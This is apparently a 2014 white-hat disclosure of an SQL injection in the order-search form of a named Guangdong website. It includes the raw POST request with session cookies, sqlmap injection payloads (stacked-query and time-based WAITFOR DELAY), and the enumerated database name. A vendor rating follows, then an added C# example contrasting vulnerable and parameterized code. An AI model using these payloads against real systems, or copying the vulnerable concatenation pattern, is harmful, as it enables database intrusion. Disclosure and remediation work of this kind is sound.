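2014-08-28: Details reported to the vendor; awaiting vendor handling
2014-08-29: Vendor confirmed; details disclosed to the vendor only
2014-09-08: Details disclosed to core white hats and experts in related fields
2014-09-18: Details disclosed to regular white hats
2014-09-28: Details disclosed to intern white hats
2014-10-12: Details disclosed to the public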
POST request:

~~~
POST /Member/MyOrder.aspx HTTP/1.1
Host: www.183.gd.cn
Proxy-Connection: keep-alive
Content-Length: 897
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.183.gd.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.183.gd.cn/Member/MyOrder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASP.NET_SessionId=mevwmp55ggdjsfqabfoylvmn; CNZZDATA2278430=cnzz_eid%3D1100403919-1409196452-http%253A%252F%252Fwww.gdpost.com.cn%252F%26ntime%3D1409196452; PostWeb183=LoginName=li; ASPSESSIONIDQARRBSDD=EIIHPCBDMKFPEJJAGCNIGOAP; CNZZDATA2278111=cnzz_eid%3D1957482220-1409196478-http%253A%252F%252Fwww.183.gd.cn%252F%26ntime%3D1409196478

__VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDE%2BO2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47aTwyPjs%2BO2w8dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui%2FjuaCqO%2B8jOaCqOeahOS8muWRmOe6p%2BWIq%2BS4ujog5LiA6Iis5Lya5ZGYITs%2BPjs%2BOzs%2BOz4%2BOz4%2BOz4%2BOz4%2BOz4%2BO3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs%2BO2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs%2BOzs%2BO3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK%2Fku5jorqLljZXvvIE7bzx0Pjs%2BPjs%2BOzs%2BO3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi%2BaDheaPkOekuu%2B8muaCqOaaguaXtui%2FmOayoeacieiuouWNle%2B8gTtvPHQ%2BOz4%2BOz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder=123&btnSearch=%CB%D1+%CB%F7
~~~

sqlmap:

~~~
Place: POST
Parameter: txtOrder
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=...&txtOrder='; WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=...&txtOrder=' WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
~~~

~~~
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: False
available databases [1]:
[*] 183dbnew
~~~
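I don't know.

Severity: Medium
Vulnerability Rank: 8
Confirmed: 2014-08-29 11:00

Thank you very much for your report. The issue in the report has been confirmed and reproduced; it is a typical SQL injection vulnerability. Data affected: medium. Attack cost: medium. Impact: medium. Overall rating: medium, rank: 8. We are contacting the organization that manages the site to handle it.

None yet.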
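
The sqlmap output above shows that the `txtOrder` form field reaches SQL Server as part of the statement text. The following is an added example, not code from the original report or from the affected site: it puts the string-concatenation pattern that produces this class of bug beside a parameterized, validated form. The class and method names, the `Orders` table, its columns and the order-number format are all assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Hypothetical order lookup for a page like MyOrder.aspx (names are assumed).
public class OrderSearch
{
    // Assumed format: order numbers are 1-32 ASCII letters or digits.
    private static readonly Regex OrderNoPattern = new Regex(@"\A[0-9A-Za-z]{1,32}\z");

    // Vulnerable pattern: the form value is pasted into the SQL text, so a quote
    // in txtOrder ends the string literal and the remainder is parsed as SQL.
    public static DataTable FindOrdersUnsafe(SqlConnection conn, string txtOrder)
    {
        string sql = "SELECT OrderNo, Status FROM Orders WHERE OrderNo = '" + txtOrder + "'";
        return Fill(new SqlCommand(sql, conn));
    }

    // Hardened form: the statement text is constant and the value travels as a
    // typed parameter, so it is only ever compared as data, never parsed as SQL.
    public static DataTable FindOrders(SqlConnection conn, string txtOrder)
    {
        // Reject anything outside the expected format before touching the database.
        if (txtOrder == null || !OrderNoPattern.IsMatch(txtOrder))
            throw new ArgumentException("Invalid order number.", "txtOrder");

        SqlCommand cmd = new SqlCommand(
            "SELECT OrderNo, Status FROM Orders WHERE OrderNo = @orderNo", conn);
        cmd.Parameters.Add("@orderNo", SqlDbType.VarChar, 32).Value = txtOrder;
        return Fill(cmd);
    }

    // Runs the command and returns the rows; Fill opens and closes the connection.
    private static DataTable Fill(SqlCommand cmd)
    {
        DataTable table = new DataTable();
        using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
        {
            adapter.Fill(table);
        }
        return table;
    }
}
```

The report's `current user is DBA: False` line is worth preserving after the fix: keeping the application's database login limited to the tables and operations the page needs bounds the damage if another injectable query is missed.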